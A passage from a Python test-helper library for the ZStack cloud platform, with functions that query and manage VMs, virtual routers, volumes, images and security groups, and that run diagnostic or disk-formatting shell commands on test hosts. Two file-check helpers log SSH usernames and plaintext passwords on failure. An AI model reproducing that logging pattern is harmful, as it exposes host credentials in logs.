if nic.l3NetworkUuid == vr_nic.l3NetworkUuid:
return nic
test_util.test_logger("did not find NIC for VM: %s, which is using VR: %s" \
% (vm.uuid, vr.uuid))
def lib_get_vm_internal_id(vm):
cmd = "virsh dumpxml %s|grep internalId|awk -F'>' '{print $2}'|\
awk -F'<' '{print $1}'" % vm.uuid
host_ip = lib_find_host_by_vm(vm).managementIp
rsp = lib_execute_sh_cmd_by_agent(host_ip, cmd)
if rsp.return_code == 0:
ret = rsp.stdout.strip()
test_util.test_logger('Find [vm:] %s [internalId:] %s on [host:] %s iptables' % (vm.uuid, ret, host_ip))
return ret
else:
test_util.test_logger('shell error info: %s' % rsp.stderr)
#test_util.test_logger('shell command: %s' % rsp.command)
test_util.test_logger('Can not get [vm:] %s internal ID on [host:] %s' % (vm.uuid, host_ip))
return None
def lib_get_root_image_from_vm(vm):
for volume in vm.allVolumes:
if volume.type == vol_header.ROOT_VOLUME:
vm_root_image_uuid = volume.rootImageUuid
if not vm_root_image_uuid:
test_util.logger("Can't find root device for [vm:] %s" % vm.uuid)
return False
condition = res_ops.gen_query_conditions('uuid', '=', vm_root_image_uuid)
image = res_ops.query_resource(res_ops.IMAGE, condition)[0]
return image
def lib_get_vm_username(vm):
image = lib_get_root_image_from_vm(vm)
image_plan = lib_get_image_from_plan(image)
if image_plan:
username = image_plan.username_
else:
#image might be created from other root image template
#So there isn't pre-set username/password. Try to use default username.
username = os.environ.get('imageUsername')
return username
def lib_get_vm_password(vm):
image = lib_get_root_image_from_vm(vm)
image_plan = lib_get_image_from_plan(image)
if image_plan:
password = image_plan.password_
else:
#image might be created from other root image template
#So there isn't pre-set username/password. try to use default password.
password = os.environ.get('imagePassword')
return password
def lib_get_nic_by_uuid(vm_nic_uuid, session_uuid=None):
if vm_nic_uuid:
condition = res_ops.gen_query_conditions('uuid', '=', vm_nic_uuid)
return res_ops.query_resource(res_ops.VM_NIC, condition)[0]
else:
test_util.test_logger('vm_nic_uuid is None, so can not get nic inventory')
def lib_get_nic_by_ip(ip_addr, session_uuid=None):
conditions = res_ops.gen_query_conditions('ip', '=', ip_addr)
vm_nic = res_ops.query_resource(res_ops.VM_NIC, conditions, session_uuid)[0]
return vm_nic
def lib_get_vm_by_ip(ip_addr, session_uuid=None):
vm_nic = lib_get_nic_by_ip(ip_addr, session_uuid)
vm_uuid = vm_nic.vmInstanceUuid
return lib_get_vm_by_uuid(vm_uuid)
def lib_get_vm_by_nic(vm_nic_uuid, session_uuid=None):
'''
use compound query method to find vm_inv by vm_nic_uuid.
'''
conditions = res_ops.gen_query_conditions('vmNics.uuid', '=', vm_nic_uuid)
vm_invs = res_ops.query_resource(res_ops.VM_INSTANCE, conditions, \
session_uuid)
if not vm_invs:
test_util.test_logger('Could not find VM by [vmNic:] %s ' % vm_nic_uuid)
else:
return vm_invs[0]
def lib_is_vm_l3_has_vr(vm):
vm_nics = vm.vmNics
vr_l3 = lib_get_all_vr_l3_uuid()
for nic in vm_nics:
if nic.l3NetworkUuid in vr_l3:
test_util.test_logger('[vm:] %s [l3 uuid:] %s has VR network .' % (vm.uuid, nic.l3NetworkUuid))
return True
test_util.test_logger('[vm:] %s l3 network did not find VR network .' % vm.uuid)
return False
#-----------Get Virtual Router resource-------------
def lib_find_vr_mgmt_nic(vm):
for nic in vm.vmNics:
if nic.hasattr('metaData') and (int(nic.metaData) & 2 == 2):
return nic
def lib_find_vr_pub_nic(vm):
for nic in vm.vmNics:
if nic.hasattr('metaData') and (int(nic.metaData) & 1 == 1):
return nic
def lib_find_vr_private_nic(vm):
for nic in vm.vmNics:
if nic.hasattr('metaData') and (int(nic.metaData) & 4 == 4):
return nic
def lib_find_vr_by_pri_l3(l3_uuid):
'''
private l3 might have multi vrs, this function will only return the VR
which has DHCP role.
'''
#use compound query condition
cond = res_ops.gen_query_conditions('vmNics.l3NetworkUuid', '=', \
l3_uuid)
#cond = res_ops.gen_query_conditions('vmNics.metaData', '!=', '1', \
# cond)
#cond = res_ops.gen_query_conditions('vmNics.metaData', '!=', '2', \
# cond)
#cond = res_ops.gen_query_conditions('vmNics.metaData', '!=', '3', \
# cond)
cond = res_ops.gen_query_conditions('vmNics.metaData', '>', '3', \
cond)
cond = res_ops.gen_query_conditions('__systemTag__', '=', 'role::DHCP', cond)
vrs = res_ops.query_resource_with_num(res_ops.APPLIANCE_VM, cond, \
None, 0, 1)
if vrs:
return vrs[0]
def lib_find_vr_by_l3_uuid(l3_uuid):
'''
@params: l3_uuid could be any l3_uuid.
l3_uuid could be any of management L3, public L3 and private L3.
@return: will return all VRs, which has vnic belongs to l3_uuid.
'''
vrs = lib_get_all_vrs()
target_vrs = []
for vr in vrs:
for vm_nic in vr.vmNics:
if vm_nic.l3NetworkUuid == l3_uuid:
target_vrs.append(vr)
return target_vrs
def lib_find_vr_by_vm_nic(vm_nic, vm=None):
'''
Return the exact VR by giving a vm nic. Will find NIC's L3 network's VR.
@params:
vm_nic: nic inventory
vm: [Optional] vm inventory
'''
if not vm:
if vm_nic:
vm = lib_get_vm_by_nic(vm_nic.uuid)
else:
test_util.test_warn('Can not find VR, since no VM and VM_NIC is provided.')
return
l3_uuid = vm_nic.l3NetworkUuid
return lib_find_vr_by_pri_l3(l3_uuid)
def lib_find_vr_pub_ip(vr_vm):
vr_guest_nic_ip = lib_find_vr_pub_nic(vr_vm).ip
if not vr_guest_nic_ip:
test_util.test_fail('cannot find public nic IP on [virtual router uuid:] %s' % vr_vm.uuid)
return vr_guest_nic_ip
def lib_find_vr_mgmt_ip(vr_vm):
vr_guest_nic_ip = lib_find_vr_mgmt_nic(vr_vm).ip
if not vr_guest_nic_ip:
test_util.test_fail('cannot find management nic IP on [virtual router uuid:] %s' % vr_vm.uuid)
return vr_guest_nic_ip
def lib_find_vr_private_ip(vr_vm):
vr_guest_nic_ip = lib_find_vr_private_nic(vr_vm).ip
if not vr_guest_nic_ip:
test_util.test_fail('cannot find private nic IP on [virtual router uuid:] %s' % vr_vm.uuid)
return vr_guest_nic_ip
def lib_print_vr_dhcp_tables(vr_vm):
'''
Print VR DHCP tables. This API is usually be called, when checking DHCP
result failed.
params:
vr_vm: target VR VM.
return:
False: ssh VR or print VR DHCP table command execution failed.
'''
#Check VR DNS table
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = 'echo cat /etc/hosts.dhcp:; cat /etc/hosts.dhcp; echo cat /etc/hosts.leases: ; cat /etc/hosts.lease'
vr_public_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
rspstr = http.json_dump_post(testagent.build_http_path(vr_public_ip, host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
rsp = jsonobject.loads(rspstr)
if rsp.return_code != 0:
test_util.test_logger('Can not get [VR:] %s DHCP tables, error log is: %s ' % (vr_vm.uuid, rsp.stderr))
return False
else:
test_util.test_logger("[VR:] %s VR DHCP tables are: \n%s" % (vr_vm.uuid, rsp.stdout))
def lib_print_vr_network_conf(vr_vm):
'''
Print VR network config. This API is usually be called, when do testing
is failed.
params:
vr_vm: target VR VM.
return:
False: ssh VR or print VR network config failed.
'''
#Check VR DNS table
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = 'echo cat /etc/resolv.conf:; cat /etc/resolv.conf; echo ifconfig: ; ifconfig; echo iptables-save:; iptables-save'
vr_public_ip = lib_find_vr_mgmt_ip(vr_vm)
rspstr = http.json_dump_post(testagent.build_http_path(vr_public_ip, host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
rsp = jsonobject.loads(rspstr)
if rsp.return_code != 0:
test_util.test_logger('Can not get [VR:] %s network config, error log is: %s ' % (vr_vm.uuid, rsp.stderr))
return False
else:
test_util.test_logger("[VR:] %s network configuration information is: \n%s" % (vr_vm.uuid, rsp.stdout))
return True
def lib_get_all_appliance_vms(session_uuid=None):
vms = res_ops.get_resource(res_ops.APPLIANCE_VM, session_uuid)
return vms
def lib_get_all_vrs(session_uuid=None):
conditions = res_ops.gen_query_conditions('applianceVmType', '=', 'VirtualRouter')
vrs_virtualrouter = res_ops.query_resource(res_ops.APPLIANCE_VM, conditions, session_uuid)
conditions = res_ops.gen_query_conditions('applianceVmType', '=', 'vrouter')
vrs_vyos = res_ops.query_resource(res_ops.APPLIANCE_VM, conditions, session_uuid)
return vrs_virtualrouter + vrs_vyos
def lib_get_all_user_vms(session_uuid=None):
conditions = res_ops.gen_query_conditions('type', '=', inventory.USER_VM_TYPE)
vms = res_ops.query_resource(res_ops.VM_INSTANCE, conditions, session_uuid)
return vms
def lib_does_l3_has_network_service(l3_uuid):
cond = res_ops.gen_query_conditions('l3NetworkUuid', '=', l3_uuid)
l3_serv = res_ops.query_resource(res_ops.NETWORK_SERVICE_PROVIDER_L3_REF,\
cond)
if l3_serv:
return True
#return a vr list
def lib_find_vr_by_vm(vm, session_uuid=None):
'''
Find VM's all VRs and return a list, which include VR inventory objects.
If vm is VR, will return itself in a list.
params:
- vm: vm inventory object.
- session_uuid: [Optional] current session_uuid, default is admin.
'''
if lib_is_vm_vr(vm):
return [vm]
vm_l3s = []
for vm_nic in vm.vmNics:
vm_l3s.append(vm_nic.l3NetworkUuid)
#need to remove metaData l3NetworkUuid
tmp_l3_list = list(vm_l3s)
for l3_uuid in tmp_l3_list:
if not lib_does_l3_has_network_service(l3_uuid):
vm_l3s.remove(l3_uuid)
if not vm_l3s:
return []
cond = res_ops.gen_query_conditions('vmNics.l3NetworkUuid', 'in', \
','.join(vm_l3s))
cond = res_ops.gen_query_conditions('vmNics.metaData', '>', '3', cond)
cond = res_ops.gen_query_conditions('__systemTag__', '=', 'role::DHCP', cond)
vrs = res_ops.query_resource(res_ops.APPLIANCE_VM, cond, session_uuid)
if not vrs:
test_util.test_logger("Cannot find VM: [%s] 's Virtual Router VM" \
% vm.uuid)
return vrs
def lib_get_all_vr_l3_uuid():
vr_l3 = []
all_l3 = lib_get_l3s()
for l3 in all_l3:
if len(l3.networkServices) != 0:
vr_l3.append(l3.uuid)
return vr_l3
#-----------VM volume operations-------------
def lib_create_volume_from_offering(volume_creation_option=test_util.VolumeOption(), session_uuid=None):
disk_offering_uuid = volume_creation_option.get_disk_offering_uuid()
if not disk_offering_uuid :
result = res_ops.get_resource(res_ops.DISK_OFFERING, session_uuid)
disk_offering_uuid = random.choice(result).uuid
volume_creation_option.set_disk_offering_uuid(disk_offering_uuid)
name = volume_creation_option.get_name()
if not name:
name = "TestVolume"
volume_creation_option.set_name(name)
#[Inlined import]
import zstackwoodpecker.zstack_test.zstack_test_volume as zstack_volume_header
volume = zstack_volume_header.ZstackTestVolume()
volume.set_creation_option(volume_creation_option)
volume.create()
return volume
def lib_delete_volume(volume_uuid, session_uuid=None):
result = vol_ops.delete_volume(volume_uuid, session_uuid)
test_util.test_logger('[volume] uuid: %s is deleted.' % volume_uuid)
def lib_retry_when_exception(function, params, times = 5):
'''
If some function might bring unstable result and when it failed, it will
rasie exception, this function will help to do retry. When it meets firstly
pass, it will return the execution result.
'''
result = False
while times:
try:
result = function(*params)
except Exception as e:
times -= 1
test_util.test_logger('Execute Function: %s meets exeception: %s , will retry: %s times' % (function.__name__, e, times))
time.sleep(0.5)
else:
return result
return False
def lib_attach_volume(volume_uuid, vm_uuid, session_uuid=None):
result = lib_retry_when_exception(vol_ops.attach_volume, [volume_uuid, vm_uuid, session_uuid], 1)
test_util.test_logger('[volume:] uuid: %s is attached to [vm:] %s .' % (volume_uuid, vm_uuid))
return result
def lib_detach_volume(volume_uuid, session_uuid=None):
result = vol_ops.detach_volume(volume_uuid, session_uuid)
test_util.test_logger('[volume:] uuid: %s is detached from [vm].' % volume_uuid)
return result
#check if volumeInventory structure is existed.
def lib_check_volume_db_exist(volume):
try:
find_volume = res_ops.get_resource(res_ops.VOLUME, session_uuid=None, uuid=volume.uuid)[0]
except Exception as e:
test_util.test_logger('[volumeInventory uuid:] %s does not exist in database.' % volume.uuid)
return False
test_util.test_logger('[volumeInventory uuid:] %s exist in database.' % volume.uuid)
return find_volume
def lib_get_volume_by_uuid(volume_uuid):
try:
conditions = res_ops.gen_query_conditions('uuid', '=', volume_uuid)
volume = res_ops.query_resource(res_ops.VOLUME, conditions)[0]
return volume
except:
test_util.test_logger('Did not find volume in database with [uuid:] %s' % volume_uuid)
def lib_get_volume_object_host(volume_obj):
volume = volume_obj.get_volume()
try:
primaryStorageUuid = volume.primaryStorageUuid
if not primaryStorageUuid:
test_util.test_logger('Did not find any primary storage for [volume:] %s. Can not find [host] for this volume. It mostly means the volume is not attached to any VM yet. ' % volume.uuid)
return None
if volume.type == 'Data':
ps = lib_get_primary_storage_by_uuid(primaryStorageUuid)
if ps.type == inventory.NFS_PRIMARY_STORAGE_TYPE:
attached_cluster = ','.join(ps.attachedClusterUuids)
conditions = res_ops.gen_query_conditions('clusterUuid', 'in', \
attached_cluster)
conditions = res_ops.gen_query_conditions('state', '=', 'Enabled', \
conditions)
conditions = res_ops.gen_query_conditions('status', '=', \
'Connected', conditions)
host_invs = res_ops.query_resource(res_ops.HOST, conditions)
if host_invs:
host = host_invs[0]
test_util.test_logger('Find [host:] %s for volume' % host.uuid)
return host
else:
test_util.test_logger('Did not find any host, who attached primary storage: [%s] to hold [volume:] %s.' % (primaryStorageUuid, volume.uuid))
vm = volume_obj.get_target_vm().get_vm()
host = lib_get_vm_host(vm)
return host
except:
test_util.test_logger('Could not find any host for [volume:] %s.' % volume.uuid)
def lib_get_volume_host(volume):
try:
primaryStorageUuid = volume.primaryStorageUuid
if not primaryStorageUuid:
test_util.test_logger('Did not find any primary storage for [volume:] %s. Can not find [host] for this volume. It mostly means the volume is not attached to any VM yet. ' % volume.uuid)
return None
conditions = res_ops.gen_query_conditions('uuid', '=', \
primaryStorageUuid)
ps_inv = res_ops.query_resource(res_ops.PRIMARY_STORAGE, conditions, None)[0]
attached_cluster = ','.join(ps_inv.attachedClusterUuids)
conditions = res_ops.gen_query_conditions('clusterUuid', 'in', \
attached_cluster)
conditions = res_ops.gen_query_conditions('state', '=', 'Enabled', \
conditions)
conditions = res_ops.gen_query_conditions('status', '=', \
'Connected', conditions)
host_invs = res_ops.query_resource(res_ops.HOST, conditions)
if host_invs:
host = host_invs[0]
test_util.test_logger('Find [host:] %s for volume' % host.uuid)
return host
else:
test_util.test_logger('Did not find any host, who attached primary storage: [%s] to hold [volume:] %s.' % (primaryStorageUuid, volume.uuid))
except:
test_util.test_logger('Could not find any host for [volume:] %s.' % volume.uuid)
#check if volume file is created in primary storage
def lib_check_volume_file_exist(volume, host=None):
volume_installPath = volume.installPath
if not volume_installPath:
test_util.test_logger('[installPath] is Null for [volume uuid: ] %s .' % volume.uuid)
return False
if not host:
host = lib_get_volume_host(volume)
cmd = host_plugin.HostShellCmd()
file_exist = "file_exist"
cmd.command = '[ -f %s ] && echo %s' % (volume_installPath, file_exist)
rspstr = http.json_dump_post(testagent.build_http_path(host.managementIp, host_plugin.HOST_SHELL_CMD_PATH), cmd)
rsp = jsonobject.loads(rspstr)
output = jsonobject.dumps(rsp.stdout)
if file_exist in output:
test_util.test_logger('[volume file: ] %s exist on [host name:] %s .' % (volume.uuid, host.name))
return True
else:
test_util.test_logger('[volume file: ] %s does not exist on [host name:] %s .' % (volume.uuid, host.name))
return False
#check if volume is attached to vm in Database
def lib_check_is_volume_attached_to_vm_in_db(vm, volume):
find_volume = lib_check_volume_db_exist(volume)
if not find_volume:
return False
if find_volume.vmInstanceUuid == vm.uuid:
test_util.test_logger('[volume:] %s is attached to [vm:] %s in zstack database.' % (volume.uuid, vm.uuid))
return find_volume
else:
test_util.test_logger('[volume:] %s is NOT attached to [vm:] %s in zstack database.' % (volume.uuid, vm.uuid))
return False
#check if volume file is attached to vm
def lib_check_is_volume_attached_to_vm(vm, volume):
find_volume = lib_check_is_volume_attached_to_vm_in_db(vm, volume)
if not find_volume:
return False
if vm.state == vm_header.STOPPED:
test_util.test_logger('[vm:] %s is stopped. Skip volume existence checking.' % volume.uuid)
return True
volume_installPath = volume.installPath
if not volume_installPath:
test_util.test_logger('[installPath] is Null for [volume uuid: ] %s .' % volume.uuid)
return False
host = lib_get_vm_host(vm)
cmd = vm_plugin.VmStatusCmd()
cmd.vm_uuids = [vm.uuid]
rspstr = http.json_dump_post(testagent.build_http_path(host.managementIp, vm_plugin.VM_BLK_STATUS), cmd)
rsp = jsonobject.loads(rspstr)
output = jsonobject.dumps(rsp.vm_status[vm.uuid])
if volume_installPath in output:
test_util.test_logger('[volume file:] %s is found in [vm:] %s on [host:] %s .' % (volume.uuid, vm.uuid, host.managementIp))
return True
else:
test_util.test_logger('[volume file:] %s is not found in [vm:] %s on [host:] %s .' % (volume.uuid, vm.uuid, host.managementIp))
return False
def lib_get_primary_storage_by_vm(vm):
ps_uuid = vm.allVolumes[0].primaryStorageUuid
cond = res_ops.gen_query_conditions('uuid', '=', ps_uuid)
ps = res_ops.query_resource(res_ops.PRIMARY_STORAGE, cond)[0]
return ps
def lib_get_backup_storage_list_by_vm(vm, session_uuid=None):
'''
Return backup storage list which attached to the VM's zone.
'''
zone_uuid = vm.zoneUuid
conditions = res_ops.gen_query_conditions('attachedZoneUuids', 'in', zone_uuid)
bss = res_ops.query_resource(res_ops.BACKUP_STORAGE, conditions, session_uuid)
if not bss:
test_util.test_logger('Can not find [backup storage] record for [vm:] %s.' % vm.uuid)
else:
return bss
def lib_create_template_from_volume(volume_uuid, session_uuid=None):
bss = res_ops.get_resource(res_ops.BACKUP_STORAGE, session_uuid)
volume = lib_get_volume_by_uuid(volume_uuid)
bs_uuid = None
if volume.vmInstanceUuid != None:
vm = lib_get_vm_by_uuid(volume.vmInstanceUuid)
if vm.state == vm_header.RUNNING:
for bs in bss:
if hasattr(inventory, 'IMAGE_STORE_BACKUP_STORAGE_TYPE') and bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
bs_uuid = bs.uuid
break
if bs_uuid == None:
bs_uuid = bss[random.randint(0, len(bss)-1)].uuid
#[Inlined import]
import zstackwoodpecker.zstack_test.zstack_test_image as zstack_image_header
image = zstack_image_header.ZstackTestImage()
image_creation_option = test_util.ImageOption()
image_creation_option.set_backup_storage_uuid_list([bs_uuid])
image_creation_option.set_root_volume_uuid(volume_uuid)
image_creation_option.set_name('test_image')
image.set_creation_option(image_creation_option)
image.create()
return image
def lib_get_root_volume(vm):
'''
get root volume inventory by vm inventory
'''
volumes = vm.allVolumes
for volume in volumes:
if volume.type == vol_header.ROOT_VOLUME:
return volume
def lib_get_data_volumes(vm):
volumes = vm.allVolumes
data_volumes = []
for volume in volumes:
if volume.type != vol_header.ROOT_VOLUME:
data_volumes.append(volume)
return data_volumes
def lib_destroy_vm_and_data_volumes(vm_inv):
data_volumes = lib_get_data_volumes(vm_inv)
vm_ops.destroy_vm(vm_inv.uuid)
for data_volume in data_volumes:
vol_ops.delete_volume(data_volume.uuid)
def lib_destroy_vm_and_data_volumes_objs_update_test_dict(vm_obj, test_obj_dict):
vm_obj.destroy()
test_obj_dict.rm_vm(vm_obj)
for volume in test_obj_dict.get_volume_list():
volume.clean()
def lib_get_root_volume_uuid(vm):
return vm.rootVolumeUuid
def lib_get_all_volumes(vm):
return vm.allVolumes
#-----------Get Image resource-------------
#Assume all image are using same username and password
def lib_get_vr_image_username(vr_vm):
username = lib_get_vr_image_from_plan(vr_vm).username_
return username
def lib_get_vr_image_password(vr_vm):
password = lib_get_vr_image_from_plan(vr_vm).password_
return password
def lib_get_vr_image_from_plan(vr_vm=None):
if vr_vm:
return lib_get_image_from_plan(lib_get_root_image_from_vm(vr_vm))
vr_image_name = os.environ.get('virtualRouterImageName')
if not vr_image_name:
test_util.logger("Can't find 'virtualRouterImageName' env params, which is used to identify vritual router image")
return None
images = deploy_config.images.image
if not isinstance(images, list):
if images.name_ == vr_image_name:
return images
else:
return None
for image in images:
if image.name_ == vr_image_name:
return image
def lib_get_image_from_plan(image):
images = deploy_config.images.image
if not isinstance(images, list):
if images.name_ == image.name:
return images
else:
return None
for img in images:
if img.name_ == image.name:
return img
def lib_get_disk_offering_by_name(do_name, session_uuid = None):
conditions = res_ops.gen_query_conditions('name', '=', do_name)
disk_offering = res_ops.query_resource(res_ops.DISK_OFFERING, conditions, \
session_uuid)
if not disk_offering:
test_util.test_logger('Could not find disk offering with [name:]%s ' % do_name)
return None
else:
return disk_offering[0]
#disk_offerings = res_ops.get_resource(res_ops.DISK_OFFERING, session_uuid=None)
#for disk_offering in disk_offerings:
# if disk_offering.name == do_name:
# return disk_offering
def lib_get_images(session_uuid = None):
return res_ops.get_resource(res_ops.IMAGE, session_uuid = session_uuid)
def lib_get_root_images(session_uuid = None):
cond = res_ops.gen_query_conditions('mediaType', '=', 'RootVolumeTemplate')
cond = res_ops.gen_query_conditions('status', '!=', 'Deleted', cond)
return res_ops.query_resource(res_ops.IMAGE, cond, session_uuid)
def lib_get_data_images(session_uuid = None):
cond = res_ops.gen_query_conditions('mediaType', '=', 'DataVolumeTemplate')
return res_ops.query_resource(res_ops.IMAGE, cond, session_uuid)
def lib_get_ISO(session_uuid = None):
cond = res_ops.gen_query_conditions('mediaType', '=', 'ISO')
return res_ops.query_resource(res_ops.IMAGE, cond, session_uuid)
def lib_get_image_by_uuid(image_uuid, session_uuid = None):
condition = res_ops.gen_query_conditions('uuid', '=', image_uuid)
images = res_ops.query_resource(res_ops.IMAGE, condition, session_uuid)
if images:
return images[0]
def lib_get_vm_image(vm_inv, session_uuid = None):
'''
return vm_inv's image template inventory
'''
root_volume_inv = lib_get_root_image_from_vm(vm_inv)
return lib_get_image_by_uuid(root_volume_inv.rootImageUuid, session_uuid)
def lib_get_not_vr_images():
'''
return all images, besides of the images for Virtual Router Offering
'''
images = lib_get_root_images()
vr_offerings = res_ops.query_resource(res_ops.VR_OFFERING, [])
vr_images = []
for vr_offering in vr_offerings:
vr_images.append(vr_offering.imageUuid)
temp_images = list(images)
for img in images:
if img.uuid in vr_images:
temp_images.remove(img)
return temp_images
def lib_get_image_by_desc(img_desc):
images = lib_get_images()
for image in images:
if image.description == img_desc:
return image
def lib_get_image_by_name(img_name):
cond = res_ops.gen_query_conditions('name', '=', img_name)
images = res_ops.query_resource(res_ops.IMAGE, cond)
if images:
return images[0]
test_util.test_logger("not find image with name: %s" % img_name)
return False
def lib_remove_image_from_list_by_desc(images, img_desc):
imgs = images
for image in images:
if image.description == img_desc:
imgs.remove(image)
return imgs
def lib_check_image_db_exist(image):
imgs = test_stub.lib_get_images()
for img in imgs:
if img.uuid == image.uuid:
test_util.test_logger('[image:] %s is found in zstack database' % img.uuid)
return True
test_util.test_logger('[image:] %s is not found in zstack database' % img.uuid)
return False
#Should depend on backup storage uuid to get host info
def lib_check_backup_storage_image_file(image):
backupStorages = image.backupStorageRefs
bs_one = backupStorages[0]
bs = lib_get_backup_storage_by_uuid(bs_one.backupStorageUuid)
image_url = bs_one.installPath
host = lib_get_backup_storage_host(bs.uuid)
if hasattr(inventory, 'IMAGE_STORE_BACKUP_STORAGE_TYPE') and bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
image_info = image_url.split('://')[1].split('/')
image_url = '%s/registry/v1/repos/public/%s/manifests/revisions/%s' \
% (bs.url, image_info[0], image_info[1])
return lib_check_file_exist(host, image_url)
elif bs.type == inventory.SFTP_BACKUP_STORAGE_TYPE:
return lib_check_file_exist(host, image_url)
test_util.test_logger('Did not find suiteable checker for bs: %s, whose type is: %s ' % (bs.uuid, bs.type))
def lib_check_file_exist(host, file_path):
command = 'ls -l %s' % file_path
eout = ''
try:
if host.sshPort != None:
(ret, out, eout) = ssh.execute(command, host.managementIp, host.username, host.password, port=int(host.sshPort))
else:
(ret, out, eout) = ssh.execute(command, host.managementIp, host.username, host.password)
test_util.test_logger('[file:] %s was found in [host:] %s' % (file_path, host.managementIp))
return True
except:
#traceback.print_exc(file=sys.stdout)
test_util.test_logger('Fail to execute: ssh [host:] %s with [username:] %s and [password:] %s to check [file:] %s . This might be expected behavior.'% (host.managementIp, host.username, host.password, file_path))
test_util.test_logger('ssh execution stderr output: %s' % eout)
test_util.test_logger(linux.get_exception_stacktrace())
return False
def lib_check_backup_storage_file_exist(backup_storage, file_path):
command = 'ls -l %s' % file_path
eout = ''
try:
if backup_storage.sshPort != None:
(ret, out, eout) = ssh.execute(command, backup_storage.hostname, backup_storage.username, backup_storage.password, port=backup_storage.sshPort)
else:
(ret, out, eout) = ssh.execute(command, backup_storage.hostname, backup_storage.username, backup_storage.password)
test_util.test_logger('[file:] %s was found in [host:] %s' % (file_path, backup_storage.hostname))
return True
except:
#traceback.print_exc(file=sys.stdout)
test_util.test_logger('Fail to execute: ssh [backup_storage:] %s with [username:] %s and [password:] %s to check [file:] %s . This might be expected behavior.'% (backup_storage.hostname, backup_storage.username, backup_storage.password, file_path))
test_util.test_logger('ssh execution stderr output: %s' % eout)
test_util.test_logger(linux.get_exception_stacktrace())
return False
def lib_check_two_files_md5(host1, file1, host2, file2):
command1 = "md5sum %s" % file1
command2 = "md5sum %s" % file2
(ret, out1, eout) = ssh.execute(command1, host1.managementIp, host1.username, host1.password)
(ret, out2, eout) = ssh.execute(command2, host2.managementIp, host2.username, host2.password)
if out1.split[0] == out2.split[0]:
test_util.test_logger('[file1:] %s and [file2:] %s MD5 checksum are same.' % (file1, file2))
return True
else:
test_util.test_logger('[file1:] %s and [file2:] %s MD5 checksum are different' % (file1, file2))
return False
def lib_delete_image(img_uuid, session_uuid=None):
vol_ops.delete_image(img_uuid, session_uuid)
def lib_mkfs_for_volume(volume_uuid, vm_inv):
'''
Will check if volume's 1st partition could be mountable. If not, it will try
to make a partition and make an ext3 file system on it.
@params:
volume_uuid: the target volume's uuid
vm_inv: the utility vm, which will help to make fs in volume.
'''
volume = lib_get_volume_by_uuid(volume_uuid)
#Root volume can not be detached.
if volume.type == vol_header.ROOT_VOLUME:
test_util.test_logger("[volume:] %s is Root Volume. It can not be make filesystem." % volume_uuid)
return False
old_vm_uuid = None
if volume.vmInstanceUuid:
old_vm_uuid = volume.vmInstanceUuid
lib_detach_volume(volume_uuid)
lib_attach_volume(volume_uuid, vm_inv.uuid)
mount_point = '/tmp/zstack/mnt'
import tempfile
script_file = tempfile.NamedTemporaryFile(delete=False)
script_file.write('''
mkdir -p %s
device="/dev/`ls -ltr --file-type /dev | awk '$4~/disk/ {print $NF}' | grep -v '[[:digit:]]' | tail -1`"
mount ${device}1 %s
if [ $? -ne 0 ]; then
fdisk $device <<EOF
n
p
1
w
EOF
mkfs.vfat ${device}1
else
umount %s
fi
''' % (mount_point, mount_point, mount_point))
script_file.close()
if not lib_execute_shell_script_in_vm(vm_inv, script_file.name):
test_util.test_fail("make partition and make filesystem operation failed in [volume:] %s in [vm:] %s" % (volume_uuid, vm_inv.uuid))
lib_detach_volume(volume_uuid)
os.unlink(script_file.name)
return False
test_util.test_logger("Successfully make partition and make filesystem operation in [volume:] %s in [vm:] %s" % (volume_uuid, vm_inv.uuid))
lib_detach_volume(volume_uuid)
os.unlink(script_file.name)
if old_vm_uuid:
lib_attach_volume(volume_uuid, old_vm_uuid)
return True
#-----------Snapshot Operations-----------
def lib_get_volume_snapshot_tree(volume_uuid = None, tree_uuid = None, session_uuid = None):
if not volume_uuid and not tree_uuid:
test_util.test_logger("volume_uuid and tree_uuid should not be None at the same time")
return
import apibinding.api_actions as api_actions
action = api_actions.GetVolumeSnapshotTreeAction()
action.volumeUuid = volume_uuid
action.treeUuid = tree_uuid
ret = acc_ops.execute_action_with_session(action, session_uuid).inventories
return ret
#-----------Security Group Operations-------------
def lib_create_security_group(name=None, desc=None, session_uuid=None):
if not name:
name = "Security_Group_Testing"
if not desc:
desc = "Security Group For Testing"
sg_creation_option = test_util.SecurityGroupOption()
sg_creation_option.set_name(name)
sg_creation_option.set_description(desc)
#[Inlined import]
import zstackwoodpecker.zstack_test.zstack_test_security_group as zstack_sg_header
sg = zstack_sg_header.ZstackTestSecurityGroup()
sg.set_creation_option(sg_creation_option)
sg.create()
return sg
def lib_delete_security_group(sg_uuid, session_uuid=None):
return net_ops.delete_security_group(sg_uuid, session_uuid)
def lib_add_sg_rules(sg_uuid, rules, session_uuid=None):
return net_ops.add_rules_to_security_group(sg_uuid, rules, session_uuid)
def lib_remove_sg_rules(rules, session_uuid=None):
return net_ops.remove_rules_from_security_group(rules, session_uuid)
def lib_add_nic_to_sg(sg_uuid, vm_nics, session_uuid=None):
return net_ops.add_nic_to_security_group(sg_uuid, vm_nics, session_uuid)
def lib_remove_nic_from_sg(sg_uuid, nic_uuid, session_uuid=None):
return net_ops.remove_nic_from_security_group(sg_uuid, [nic_uuid], \
session_uuid)
def lib_attach_security_group_to_l3(sg_uuid, l3_uuid, session_uuid=None):
return net_ops.attach_security_group_to_l3(sg_uuid, l3_uuid, session_uuid)
def lib_detach_security_group_from_l3(sg_uuid, l3_uuid, session_uuid=None):
return net_ops.detach_security_group_from_l3(sg_uuid, l3_uuid, session_uuid)
def lib_attach_security_group_to_l3_by_nic(sg_uuid, vm_nic, session_uuid=None):
l3_uuid = vm_nic.l3NetworkUuid
lib_attach_security_group_to_l3(sg_uuid, l3_uuid, session_uuid)
def lib_has_rule_in_sg(sg_inv, protocol=None, target_ip=None, direction=None, port=None):
for rule in sg_inv.rules:
if protocol and not rule.protocol == protocol:
continue
if target_ip and not rule.allowedCidr == (target_ip + '/32'):
continue
if direction and not rule.type == direction:
continue
if port and not rule.port == port:
continue
return True
def lib_get_sg_invs_by_nic_uuid(nic_uuid):
'''
Get all SG inventorys related with nic_uuid
'''
conditions = res_ops.gen_query_conditions('vmNicUuid', '=', nic_uuid)
